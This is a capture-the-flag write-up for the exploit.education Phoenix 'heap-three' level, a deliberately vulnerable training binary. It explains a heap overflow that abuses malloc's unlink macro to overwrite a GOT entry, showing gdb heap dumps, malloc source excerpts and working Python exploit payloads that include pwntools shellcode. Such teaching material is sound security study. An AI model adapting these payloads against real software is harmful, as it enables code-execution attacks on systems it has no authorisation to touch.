exploit.education Phoenix

Write-up for: https://exploit.education/phoenix/heap-three/.

The vulnerability

The program allocates three 32-byte buffers in the heap, copies user data into these buffers without checking the bounds of the input and then frees the buffers. The calls to strcpy are not bounds-checked and therefore prone to a heap-based buffer overflow.

Executing winner

Our first goal is to execute the winner function. To do this, we need to overwrite the GOT entry of printf which is called at the end of the main function. This means that we will need an arbitrary write primitive.

We know that the malloc implementation stores metadata about allocated chunks next to the user data. Since we allocate multiple buffers in a row and we can overflow the first two buffers, we can overwrite this metadata. How does the chunk structure look like?

struct malloc_chunk {

  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;
};

This is a simplified representation of the actual chunks in memory since it ommits the actual user data. Another aspect thats hidden in this struct definition is the fact that the size field contains additional flags (the least-significant bits of the field). One of these flags (the LSB) indicates if the previous chunk is free or not. If it is set, prev_size is also set. This will become interesting later on. But first, let’s look at our heap once before allocation and once after freeing the heap memory:

gef➤  break *main+143
Breakpoint 4 at 0x804888b
gef➤  break *main+176
Breakpoint 5 at 0x80488ac
gef➤  run AAAAAAAA BBBBBBBB CCCCCCCC

gef➤  x/64x 0xf7e69058-88
0xf7e69000:     0x00000000      0x00000029      0x41414141      0x41414141
0xf7e69010:     0x00000000      0x00000000      0x00000000      0x00000000
0xf7e69020:     0x00000000      0x00000000      0x00000000      0x00000029
0xf7e69030:     0x42424242      0x42424242      0x00000000      0x00000000
0xf7e69040:     0x00000000      0x00000000      0x00000000      0x00000000
0xf7e69050:     0x00000000      0x00000029      0x43434343      0x43434343
0xf7e69060:     0x00000000      0x00000000      0x00000000      0x00000000
0xf7e69070:     0x00000000      0x00000000      0x00000000      0x000fff89
0xf7e69080:     0x00000000      0x00000000      0x00000000      0x00000000
0xf7e69090:     0x00000000      0x00000000      0x00000000      0x00000000

gef➤  x/64x 0xf7e69058-88
0xf7e69000:     0x00000000      0x00000029      0xf7e69028      0x41414141
0xf7e69010:     0x00000000      0x00000000      0x00000000      0x00000000
0xf7e69020:     0x00000000      0x00000000      0x00000000      0x00000029
0xf7e69030:     0xf7e69050      0x42424242      0x00000000      0x00000000
0xf7e69040:     0x00000000      0x00000000      0x00000000      0x00000000
0xf7e69050:     0x00000000      0x00000029      0x00000000      0x43434343
0xf7e69060:     0x00000000      0x00000000      0x00000000      0x00000000
0xf7e69070:     0x00000000      0x00000000      0x00000000      0x000fff89
0xf7e69080:     0x00000000      0x00000000      0x00000000      0x00000000
0xf7e69090:     0x00000000      0x00000000      0x00000000      0x00000000

In the first print (before the free calls), we can see all three buffers are next to each other in memory. All three user buffers start with 0x00000029. Since this is nothing we entered, it must be the metadata for the heap manager. We know the buffers have a size of 32 bytes (0x20). There are 8 bytes of heap metadata, so 0x28. But why 0x29? This one bit is the “is previous chunk in use” flag.

After freeing, the picture is different from what we expect. Normally, freed chunks are stored in a ‘free list’, a doubly-linked list from where the heap manager can re-use chunks. This is where the fd, bk and prev_size fields come into play. So we would excpect at least two pointers and a size in our data, right? If we look closely, we can see that there is one pointer per chunk:

0xf7e69000:     0x00000000      0x00000029      0xf7e69028      0x41414141

0xf7e69028 clearly points to the next chunk (the one containing the ‘B’s). But what’s missing is the bk pointer, as well as the prev_size field. The reason for this is, that small chunks are organized in a so called ‘fastbin’ after freeing. This is a singly-linked list structure that is used as an optimization for small-size allocations. Chunks in a fastbin can be re-used very quickly for allocations of the same size. This is also explained in the malloc implementation:

/*
  Fastbins

    An array of lists holding recently freed small chunks.  Fastbins
    are not doubly linked.  It is faster to single-link them, and
    since chunks are never removed from the middles of these lists,
    double linking is not necessary. Also, unlike regular bins, they
    are not even processed in FIFO order (they use faster LIFO) since
    ordering doesn't much matter in the transient contexts in which
    fastbins are normally used.

    Chunks in fastbins keep their inuse bit set, so they cannot
    be consolidated with other free chunks. malloc_consolidate
    releases all chunks in fastbins and consolidates them with
    other free chunks. 
*/

There are other resources that explain this stuff way more in-depth and better than I could. For example check out Azeria Labs’ excellent heap exploitation articles.

Let’s focus on how to use this knowledge for solving the challenge at hand.

The idea is to somehow manipulate the heap manager into writing arbitrary data to a location of our choice. As a consequence, we need to look for statements that write to memory in the normal code flow of the malloc implementation. Following the free function’s code flow, we will stumble accross the unlink macro:

/* Take a chunk off a bin list */
#define unlink(P, BK, FD) {                                            \
  FD = P->fd;                                                          \
  BK = P->bk;                                                          \
  FD->bk = BK;                                                         \
  BK->fd = FD;                                                         \
}

This operation is just implementing the standard way of taking something off of a doubly-linked list. Calling this will effectively remove P from the list by setting the backwards pointer of the next chunk (FD->bk) to the backwards pointer of P (BK) and setting the forward pointer of the previous chunk (BK->fd) to the forward pointer of P (FD). This is a write operation: the heap manager writes the value of P->bk to the location specified by FD.bk. If we are able to control these values, we can write to a memory location of our choice!

This means if we can specify bk and fd of chunk P the value of bk will be written to the address specified at fd + 12. Let’s have a look at the call of unlink:

/* consolidate backward */
if (!prev_inuse(p)) {
	prevsize = p->prev_size;
	size += prevsize;
	p = chunk_at_offset(p, -((long) prevsize));
	unlink(p, bck, fwd);
}

As you can see, the P we want to modify is actually the chunk at the offset of the chunk we call free on and its prev_size field. bck and fwd are temporary variables. Let’s rewrite the unlink macro in the context of the c chunk during the first free call:

prev = (c - c->prev_size);
*(prev->fd + 12) = prev->bk;
*(prev->bk + 8) = prev->fd;

This indicates that we need to set prev_size so that we can control the fd and bk values.

However, as we saw above, this unlink macro is not called for freed chunks in fastbins. How does the heap manager determine if a freed chunk goes to a fastbin? The answer can be found in the implementation of free:

/*
  If eligible, place chunk on a fastbin so it can be found
  and used quickly in malloc.
*/

if ((CHUNK_SIZE_T)(size) <= (CHUNK_SIZE_T)(av->max_fast)

Looking around the malloc source we find the definition for the maximum size of chunk that goes to fastbins:

/* The maximum fastbin request size we support */
#define MAX_FAST_SIZE     80

In reality, this might be smaller than 80 because it is configurable.

Now we have all the information we need. We can now use the overflow to construct the second and third heap chunks in a way that ensures that unlink is called. We also provide the address we want to write to and the word we want to write inside of this payload. To recap:

size of chunk to be freed must be greater than 80 to avoid fastbin handling
prev_inuse flag must be unset, so that during the free operation, b and c are coalesced using unlink
prev_size must be safe to be subtracted from a pointer. Also it cannot contain null bytes

As a value for prev_size we can use 0xfffffffc. This fulfills two properties. Since this value is cast to long in the prev calculation, it is interpreted as -4. This is safe to subtract from the current chunk pointer as it is very small (in fact, we will add 4). Additionally, the LSB is set to zero, so we will call unlink as intended.

So basically we write the value at c + 4 (prev_size) + 12 (prev->bk) to the address specified at c + 4 (prev_size) + 8 + 12 (prev->fd).

This results in the following payload generation. We put random values for the write value and target address for now to check if it works. We expect to see a write access violation from within the unlink macro.

import struct

payload = ""
payload = payload + "A" * 32 # buf a

payload = payload + " " +  "B" * 32  # buf b 

# overwriting into chunk c
payload = payload + struct.pack("<I", 0xfffffffc) # prev_size
payload = payload + struct.pack("<I", 0xfffffffc) # size, must be greater than 80
payload = payload + "\xff\xff\xff\xff" # 4 bytes of chunk, since prev_size is 4
payload = payload + struct.pack("<I", 0xdeadbeef - 12) # TARGET 
payload = payload + struct.pack("<I", 0xdeadbeef) # WORD TO WRITE


# satisfy strcpy for third argument
payload = payload + " CCCC"

print(payload)

It worked! As you can see, the program is trying to write 0xdeadbeef to 0xdeadbe00 + 0xc:

→  0x8049941 <free+234>       mov    DWORD PTR [eax+0xc], edx
$eax   : 0xdeadbe00
$ebx   : 0xffffdcf0  →  0x00000004
$ecx   : 0x0
$edx   : 0xdeadbeef

Now we need to figure out what we want to write where in order to redirect execution to the winner function. What comes to mind is overwriting the GOT entry for puts which is called after the free calls.

First, we need to find the address of puts in the PLT and of the winner function:

(gdb) disas winner
Dump of assembler code for function winner:
   0x080487d5 <+0>:     push   ebp

(gdb) disas 'puts@plt'
Dump of assembler code for function puts@plt:
   0x080485b0 <+0>:     jmp    DWORD PTR ds:0x804c13c
   0x080485b6 <+6>:     push   0x28
   0x080485bb <+11>:    jmp    0x8048550

Now we change the payload and run the exploit.

(gdb) run $(python heap3.py)
Starting program: /opt/phoenix/i486/heap-three $(python heap3.py)

Program received signal SIGSEGV, Segmentation fault.
0x0804994a in free ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0x080487d5  →  <winner+0> push ebp
$ebx   : 0xffffdcf0  →  0x00000004
$ecx   : 0x0
$edx   : 0x0804c100  →  <_DYNAMIC+156> add BYTE PTR [eax], al
$esp   : 0xffffdc70  →  0x00000000
$ebp   : 0xffffdca8  →  0xffffdcd8  →  0xffffdd78  →  0xffffdef2  →  "_=/usr/local/bin/gdb"
$esi   : 0xffffdd64  →  0xffffde7a  →  "/opt/phoenix/i486/heap-three"
$edi   : 0x4
$eip   : 0x0804994a  →  <free+243> mov DWORD PTR [eax+0x8], edx
$eflags: [carry parity adjust zero SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffdc70│+0x0000: 0x00000000   ← $esp
0xffffdc74│+0x0004: 0x00000028 ("("?)
0xffffdc78│+0x0008: 0x080487d5  →  <winner+0> push ebp
0xffffdc7c│+0x000c: 0x0804c100  →  <_DYNAMIC+156> add BYTE PTR [eax], al
0xffffdc80│+0x0010: 0xfffffffc
0xffffdc84│+0x0014: 0xfffffffc
0xffffdc88│+0x0018: 0xf7e6904c  →  0x42424242
0xffffdc8c│+0x001c: 0xf7f8453e  →  <strcpy+30> add esp, 0x14
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
    0x8049941 <free+234>       mov    DWORD PTR [eax+0xc], edx
    0x8049944 <free+237>       mov    eax, DWORD PTR [ebp-0x30]
    0x8049947 <free+240>       mov    edx, DWORD PTR [ebp-0x2c]
 →  0x804994a <free+243>       mov    DWORD PTR [eax+0x8], edx
    0x804994d <free+246>       mov    eax, DWORD PTR [ebp-0x14]
    0x8049950 <free+249>       mov    eax, DWORD PTR [eax+0x2c]
    0x8049953 <free+252>       cmp    DWORD PTR [ebp-0x20], eax
    0x8049956 <free+255>       je     0x80499fc <free+421>
    0x804995c <free+261>       mov    edx, DWORD PTR [ebp-0x20]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "heap-three", stopped, reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x804994a → free()
[#1] 0x8048890 → main()

Segfault? What happened here? If you look closely at the instructions, it becomes clear. We forgot about the second write that is executed during unlink:

*(prev->bk + 8) = prev->fd;

mov    DWORD PTR [eax+0x8], edx

This means we are writing something 8 bytes after the start of the winner function (the address of which is in prev->bk). This section of memory is flagged as read-only and thus the program crashes. We need a different strategy keeping the fact in mind that both prev->bk + 8 and prev->fd + 12 must be writable addresses.

Our new strategy is to place a short shellcode on the heap and store the address of this shellcode in puts@plt. The shellcode will then call the winner function. This additional indirection ensures that the second write happens in a writable memory segment (the heap). We generate shellcode using the pwntools library and embed it in our payload. Then we modify the word to write to be the address of our shellcode. We don’t care about the second write since our shellcode is sufficiently short. The address of the shellcode is always the same on the system since ASLR is not enabled. We can find the address of the heap using gdb (the first segment after the program):

 (gdb) info proc mappings
process 9561
Mapped address spaces:

        Start Addr   End Addr       Size     Offset objfile
         0x8048000  0x804c000     0x4000        0x0 /opt/phoenix/i486/heap-three
         0x804c000  0x804d000     0x1000     0x3000 /opt/phoenix/i486/heap-three
        0xf7e69000 0xf7f69000   0x100000        0x0
        0xf7f69000 0xf7f6b000     0x2000        0x0 [vvar]
        0xf7f6b000 0xf7f6d000     0x2000        0x0 [vdso]
        0xf7f6d000 0xf7ffa000    0x8d000        0x0 /opt/phoenix/i486-linux-musl/lib/libc.so
        0xf7ffa000 0xf7ffb000     0x1000    0x8c000 /opt/phoenix/i486-linux-musl/lib/libc.so
        0xf7ffb000 0xf7ffc000     0x1000    0x8d000 /opt/phoenix/i486-linux-musl/lib/libc.so
        0xf7ffc000 0xf7ffe000     0x2000        0x0
        0xfffdd000 0xffffe000    0x21000        0x0 [stack]

This results in a new exploit:

import struct
import pwnlib

shellcode = "push 0x080487d5; ret" # call winner
shellcode = pwnlib.asm.asm(shellcode)

# First argument
payload = ""
payload = payload + "\x90" * 16 + shellcode # buffer a with shellcode and NOP sled

# Second argument
payload = payload + " " +  "B" * 32  # buffer b 

# overwriting into chunk c
payload = payload + struct.pack("<I", 0xfffffffc) # prev_size, -4 so we can control prev->bk and prev->fd
payload = payload + struct.pack("<I", 0xfffffffc) # size

# Third argument 
payload = payload + " " + "\xff\xff\xff\xff" # 4 bytes of chunk, since prev_size is -4
payload = payload + struct.pack("<I", 0x804c13c - 12) # TARGET, puts@plt 
payload = payload + struct.pack("<I", 0xf7e69000 + 16 + 8) # WORD TO WRITE, address of shellcode / buffer a

print(payload)

Let’s run it:

(gdb) run $(python heap3.py)
Starting program: /opt/phoenix/i486/heap-three $(python heap3.py)

Program received signal SIGSEGV, Segmentation fault.

→  0x8049994 <free+317>       mov    DWORD PTR [eax+0xc], edx

We see yet another segfault during a familiar looking write operation. However, if we look closely, this is not the first unlink that we were targeting (which was at free+234). Re-visiting the malloc implementation reveals what happens:

if (nextchunk != av->top) {
	/* get and clear inuse bit */
	nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
	set_head(nextchunk, nextsize);

	/* consolidate forward */
	if (!nextinuse) {
	  unlink(nextchunk, bck, fwd);
	  size += nextsize;
	}
...

After successfully consolidating backwards with our crafted values, this code is executed. If the nextchunk, which is calculated to be at p + p->size, is not the last chunk and the next chunk is not in use, it is also consolidated via unlink. Since we control p->size for our crafted chunk, we can set it so that we do not take this branch. It has to fulfill these conditions:

Contains no null bytes
p + p->size points to a chunk that is in use, i.e. the is previous in use flag is not set in the following chunk

The ideal candidate is chunk a. We can set size to -80 which tricks the malloc implementation into thinking the next chunk is chunk a. Let’s try again:

import struct
import pwnlib

shellcode = "push 0x080487d5; ret" # call winner
shellcode = pwnlib.asm.asm(shellcode)

# First argument
payload = ""
payload = payload + "\x90" * 16 + shellcode # buffer a with shellcode and NOP sled

# Second argument
payload = payload + " " +  "B" * 32  # buffer b 

# overwriting into chunk c
payload = payload + struct.pack("<I", 0xfffffffc) # prev_size, -4 so we can control prev->bk and prev->fd
payload = payload + struct.pack("<I", 0xffffffb0) # size, -80 to point to chunk a 

# Third argument 
payload = payload + " " + "\xff\xff\xff\xff" # 4 bytes of chunk, since prev_size is -4
payload = payload + struct.pack("<I", 0x804c13c - 12) # TARGET, puts@plt 
payload = payload + struct.pack("<I", 0xf7e69000 + 16 + 8) # WORD TO WRITE, address of shellcode / buffer a

print(payload)

root@phoenix-amd64:/opt/phoenix/i486# ./heap-three $(python heap3.py)
Level was successfully completed at @ 1556717659 seconds past the Epoch

Game over!

Final words

For me personally, this was by far the hardest challenge on exploit.education, yet. It took me a lot of time to understand this type of attack and to implement it myself. So don’t be discouraged if you don’t understand what’s going on right away. Once you do, this is a pretty eye opening exercise since we now advanced from simply overwriting some values in memory to carefully manipulating the control flow of a program in order to execute our own code. I highly recommend reading the Phrack papers linked below that originally discussed exploiting the unlink macro.

Additional links

how2heap

Vudo - Phrack 57

Once upon a free() - Prack 57

LiveOverflow

Azeria Labs